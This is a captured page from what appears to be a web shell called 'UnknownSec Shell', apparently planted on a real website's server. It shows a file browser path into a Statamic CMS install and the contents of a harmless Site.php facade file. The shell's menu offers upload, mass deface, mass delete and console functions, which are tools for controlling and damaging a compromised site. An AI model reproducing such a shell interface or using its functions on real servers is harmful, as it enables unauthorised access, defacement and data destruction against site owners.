shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolasweb.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Facades
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Site.php
<?php namespace Statamic\Facades; use Illuminate\Support\Facades\Facade; use Statamic\Sites\Sites; /** * @method static bool multiEnabled() * @method static mixed all() * @method static mixed authorized() * @method static mixed default() * @method static bool hasMultiple() * @method static mixed get($handle) * @method static mixed findByUrl($url) * @method static mixed current() * @method static void setCurrent($site) * @method static void resolveCurrentUrlUsing(Closure $callback) * @method static mixed selected() * @method static void setSelected($site) * @method static self setSites($sites) * @method static self setSiteValue(string $site, string $key, $value) * @method static string path() * @method static \Statamic\Fields\Blueprint blueprint() * @method static array config() * * @see \Statamic\Sites\Sites */ class Site extends Facade { protected static function getFacadeAccessor() { return Sites::class; } }
© 2026 UnknownSec